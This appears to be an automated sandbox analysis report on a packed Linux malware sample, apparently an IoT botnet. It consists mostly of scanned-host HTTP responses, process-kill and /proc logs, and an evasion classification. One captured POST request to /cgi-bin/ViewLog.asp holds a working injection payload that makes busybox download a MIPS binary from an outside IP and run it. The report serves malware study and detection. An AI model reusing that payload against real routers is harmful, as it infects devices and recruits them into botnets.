65 3d 22 31 22 20 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 04:17:49 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/7.4.28Content-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 09:17:50 GMTServer: WebsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockCache-Control: no-storeContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.21.6Date: Thu, 23 Nov 2023 04:17:51 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 31 2e 36 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.21.6</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
    Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 23 Nov 2023 04:17:53 GMTConnection: closeContent-Length: 326Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 35 30 33 2e 20 54 68 65 20 73 65 72 76 69 63 65 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Service Unavailable</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Service Unavailable</h2><hr><p>HTTP Error 503. The service is unavailable.</p></BODY></HTML>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 23 Nov 2023 04:17:56 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Web serverDate: Thu, 23 Nov 2023 04:17:55 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>Web server</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: owsdcontent-type: text/htmlcontent-length: 38Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404</h1></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: Werkzeug/3.0.1 Python/3.11.5Date: Thu, 23 Nov 2023 04:18:02 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainDate: Thu, 23 Nov 2023 04:18:03 GMTContent-Length: 18Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainDate: Thu, 23 Nov 2023 04:18:04 GMTContent-Length: 18Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 07:18:03 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 1050Date: Thu, 23 Nov 2023 04:18:07 GMT
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 23 Nov 2023 04:18:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: mini_httpd/1.19 19dec2003Date: Thu, 23 Nov 2023 06:12:28 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sConnection: closeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 6e 69 5f 68 74 74 70 64 2f 22 3e 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 31 39 20 31 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/mini_httpd/">mini_httpd/1.19 19dec2003</A></ADDRESS></BODY></HTML>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Thu, 23 Nov 2023 04:18:13 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-control: no-cacheServer: Ubicom/1.1Content-Length: 9Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 341Connection: closeDate: Thu, 23 Nov 2023 04:18:16 GMTServer: lighttpd/1.4.54Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 Not Found</title> </head> <body> <h1>404 Not Found</h1> </body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 23 Nov 2023 04:18:17 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 23 Nov 2023 04:18:20 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Accept,Authorization,Cache-Control,Content-Type,DNT,If-Modified-Since,Keep-Alive,Origin,User-Agent,X-Mx-ReqToken,X-Requested-WithAccess-Control-Allow-Methods: GET, POST, OPTIONSData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Found
    Source: 7Ueun89KE3.elf, 5419.1.00007fd47c017000.00007fd47c028000.r-x.sdmp, 7Ueun89KE3.elf, 5421.1.00007fd47c017000.00007fd47c028000.r-x.sdmp, 7Ueun89KE3.elf, 5541.1.00007fd47c017000.00007fd47c028000.r-x.sdmp, 7Ueun89KE3.elf, 5571.1.00007fd47c017000.00007fd47c028000.r-x.sdmp, 7Ueun89KE3.elf, 5553.1.00007fd47c017000.00007fd47c028000.r-x.sdmp, 7Ueun89KE3.elf, 5423.1.00007fd47c017000.00007fd47c028000.r-x.sdmp, 7Ueun89KE3.elf, 5540.1.00007fd47c017000.00007fd47c028000.r-x.sdmp, 7Ueun89KE3.elf, 5428.1.00007fd47c017000.00007fd47c028000.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: 7Ueun89KE3.elf, 5419.1.00007fd47c017000.00007fd47c028000.r-x.sdmp, 7Ueun89KE3.elf, 5421.1.00007fd47c017000.00007fd47c028000.r-x.sdmp, 7Ueun89KE3.elf, 5541.1.00007fd47c017000.00007fd47c028000.r-x.sdmp, 7Ueun89KE3.elf, 5571.1.00007fd47c017000.00007fd47c028000.r-x.sdmp, 7Ueun89KE3.elf, 5553.1.00007fd47c017000.00007fd47c028000.r-x.sdmp, 7Ueun89KE3.elf, 5423.1.00007fd47c017000.00007fd47c028000.r-x.sdmp, 7Ueun89KE3.elf, 5540.1.00007fd47c017000.00007fd47c028000.r-x.sdmp, 7Ueun89KE3.elf, 5428.1.00007fd47c017000.00007fd47c028000.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
    Source: 7Ueun89KE3.elfString found in binary or memory: http://upx.sf.net
    Source: unknownHTTP traffic detected: POST /cgi-bin/ViewLog.asp HTTP/1.1Host: 192.168.0.14:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.20.0Content-Length: 227Content-Type: application/x-www-form-urlencodedData Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
    Source: unknownDNS traffic detected: queries for: daisy.ubuntu.com
    Source: LOAD without section mappingsProgram segment: 0x8000
    Source: /tmp/7Ueun89KE3.elf (PID: 5421)SIGKILL sent: pid: 936, result: successfulJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)SIGKILL sent: pid: 936, result: successfulJump to behavior
    Source: classification engineClassification label: mal68.troj.evad.linELF@0/0@2/0

    Data Obfuscation

    barindex
    Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
    Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
    Source: initial sampleString containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $
    Source: /tmp/7Ueun89KE3.elf (PID: 5421)File opened: /proc/490/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5421)File opened: /proc/790/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5421)File opened: /proc/792/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5421)File opened: /proc/793/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5421)File opened: /proc/795/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5421)File opened: /proc/797/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5421)File opened: /proc/778/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5421)File opened: /proc/855/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5421)File opened: /proc/914/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5421)File opened: /proc/936/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5421)File opened: /proc/816/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5421)File opened: /proc/917/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5421)File opened: /proc/780/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5421)File opened: /proc/660/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5421)File opened: /proc/1/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5421)File opened: /proc/783/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5421)File opened: /proc/884/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5421)File opened: /proc/765/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5421)File opened: /proc/800/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5421)File opened: /proc/767/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5421)File opened: /proc/802/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5421)File opened: /proc/726/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5421)File opened: /proc/803/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5421)File opened: /proc/727/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)File opened: /proc/490/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)File opened: /proc/790/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)File opened: /proc/792/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)File opened: /proc/793/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)File opened: /proc/795/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)File opened: /proc/797/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)File opened: /proc/778/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)File opened: /proc/855/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)File opened: /proc/914/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)File opened: /proc/936/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)File opened: /proc/816/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)File opened: /proc/917/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)File opened: /proc/780/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)File opened: /proc/660/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)File opened: /proc/1/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)File opened: /proc/783/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)File opened: /proc/884/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)File opened: /proc/765/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)File opened: /proc/800/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)File opened: /proc/767/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)File opened: /proc/802/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)File opened: /proc/726/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)File opened: /proc/803/fdJump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)File opened: /proc/727/fdJump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55738
    Source: unknownNetwork traffic detected: HTTP traffic on port 33148 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 33148 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 33148 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 33148 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58702 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58702 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58702 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58702 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 45022 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37066 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 45022 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 49240 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 45022 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37066 -> 37215
